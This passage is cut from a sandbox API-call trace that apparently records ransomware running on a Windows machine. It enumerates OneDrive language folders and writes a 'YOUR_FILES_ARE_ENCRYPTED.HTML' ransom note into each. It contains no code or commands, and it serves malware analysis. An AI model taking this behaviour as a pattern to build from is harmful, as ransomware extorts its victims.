nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ko", cAlternateFileName="")) returned 1 [0113.649] StrStrIW (lpFirst="ko", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.649] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ko") returned 78 [0113.649] GetProcessHeap () returned 0x600000 [0113.649] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.649] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ko" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ko") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ko" [0113.649] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ko", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ko\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ko\\*" [0113.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ko\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe086faec, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe086faec, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe0b90d17, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.650] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe086faec, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe086faec, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe0b90d17, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.650] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0b90d17, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe0b90d17, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe0d5aa8c, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0xf2c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.650] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.650] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ko\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.650] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.650] lstrlenW (lpString=".mui") returned 4 [0113.650] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.650] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0b90d17, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe0b90d17, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe0d5aa8c, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0xf2c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.650] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.650] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.650] GetProcessHeap () returned 0x600000 [0113.650] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ko\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.650] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.651] CloseHandle (hObject=0x334) returned 1 [0113.651] GetProcessHeap () returned 0x600000 [0113.651] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.651] GetProcessHeap () returned 0x600000 [0113.651] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.651] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0df3254, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe0df3254, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe0df3254, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kok", cAlternateFileName="")) returned 1 [0113.652] StrStrIW (lpFirst="kok", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.652] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kok") returned 79 [0113.652] GetProcessHeap () returned 0x600000 [0113.652] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.652] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kok" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kok") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kok" [0113.652] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kok", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kok\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kok\\*" [0113.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kok\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0df3254, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe0df3254, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe12dddac, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.653] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0df3254, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe0df3254, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe12dddac, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.653] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe12dddac, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe12dddac, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe1697913, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.653] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.653] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kok\\FileSync.LocalizedResources.dll.mui") returned 115 [0113.653] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.653] lstrlenW (lpString=".mui") returned 4 [0113.653] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.653] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe12dddac, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe12dddac, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe1697913, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.653] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.653] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0113.653] GetProcessHeap () returned 0x600000 [0113.653] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\kok\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.654] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.655] CloseHandle (hObject=0x334) returned 1 [0113.655] GetProcessHeap () returned 0x600000 [0113.655] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.655] GetProcessHeap () returned 0x600000 [0113.655] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.658] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170a286, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe170a286, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe170a286, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ku-arab", cAlternateFileName="")) returned 1 [0113.658] StrStrIW (lpFirst="ku-arab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.658] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ku-arab") returned 83 [0113.658] GetProcessHeap () returned 0x600000 [0113.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.659] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ku-arab" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ku-arab") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ku-arab" [0113.659] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ku-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ku-arab\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ku-arab\\*" [0113.659] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ku-arab\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170a286, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe170a286, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe1a9d74e, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.660] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170a286, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe170a286, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe1a9d74e, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.660] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1a9d74e, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe1a9d74e, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe1e310fb, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.660] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.660] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ku-arab\\FileSync.LocalizedResources.dll.mui") returned 119 [0113.660] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.660] lstrlenW (lpString=".mui") returned 4 [0113.660] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.660] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1a9d74e, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe1a9d74e, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe1e310fb, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.660] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.660] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ku-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0113.660] GetProcessHeap () returned 0x600000 [0113.660] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ku-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ku-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.661] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.662] CloseHandle (hObject=0x334) returned 1 [0113.662] GetProcessHeap () returned 0x600000 [0113.662] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.662] GetProcessHeap () returned 0x600000 [0113.662] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.662] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1f885e4, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe1f885e4, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe1f885e4, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ky", cAlternateFileName="")) returned 1 [0113.662] StrStrIW (lpFirst="ky", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.662] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ky") returned 78 [0113.662] GetProcessHeap () returned 0x600000 [0113.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.662] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ky" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ky") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ky" [0113.663] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ky", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ky\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ky\\*" [0113.663] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ky\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1f885e4, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe1f885e4, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe22f5ba3, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.663] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1f885e4, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe1f885e4, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe22f5ba3, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.663] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe22f5ba3, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe22f5ba3, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe25584f2, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.663] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.663] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ky\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.663] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.663] lstrlenW (lpString=".mui") returned 4 [0113.663] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.663] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe22f5ba3, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe22f5ba3, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe25584f2, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.664] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.664] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ky\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.664] GetProcessHeap () returned 0x600000 [0113.664] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ky\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ky\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.664] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.665] CloseHandle (hObject=0x334) returned 1 [0113.665] GetProcessHeap () returned 0x600000 [0113.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.665] GetProcessHeap () returned 0x600000 [0113.665] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.665] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe25f0e6c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe25f0e6c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xe25f0e6c, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, 